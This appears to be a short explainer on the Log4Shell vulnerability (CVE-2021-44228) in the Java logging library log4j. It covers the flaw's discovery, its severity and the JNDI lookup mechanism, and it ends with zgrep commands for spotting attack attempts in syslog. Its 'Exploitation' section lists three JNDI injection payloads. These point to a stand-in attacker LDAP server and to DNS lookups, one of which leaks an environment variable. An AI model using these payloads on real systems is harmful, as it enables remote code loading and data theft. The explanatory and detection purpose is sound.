Log4Shell

The Log4Shell security flaw was discovered on December 10, 2021 by security researcher Chen Zhaojun of Alibaba Cloud Security. This CVE-2021-44228 flaw was found in the Java library "log4j". Log4J is used to log events from other software, for example to write down all requests made on a website.

Why is it so critical?

Log4j is probably the most commonly used logging library (Apple, Twitter, Steam, Baidu, Amazon, Tesla, Minecraft, Google, LinkedIn, ...). It was given a CVSS score of 10, the highest possible score.

Let's take an example, you own a connected home. From the outside, everything is perfect! An attacker stands in front of your house without having the keys and just by shouting at the door "open up", it opens...

For more: List of affected software

What is it about?

The Log4Shell flaw allows an unwanted connection through the Java Naming and Directory Interface (JNDI). JNDI is a program (Java API) for connecting to directories, including LDAP directories. The exploit of the CVE-2021-44228 / Log4Shell vulnerability consists of injecting a payload, which will ask Log4j to fetch a value from a third-party source, with JNDI, and via the LDAP or DNS protocol.

Exploitation

CVE-2021-44228 can be used with payloads of the form:

${jndi:ldap://server_pirate/malicious_message}
${jndi:dns://server_dns/entry_dns}
${jndi:dns://server_dns/${env:user}}

For more: Log4Shell: 0-day found in log4j 2, a popular Java logging package

Did an attacker break into my system?

The first thing to do is to check the contents of your logs:

$ zgrep -i "jndi" /var/log/syslog
$ zgrep -i "jndi" /var/log/syslog.1
$ zgrep -i "jndi" /var/log/syslog.2.gz

For more: log4j Exploitation Detection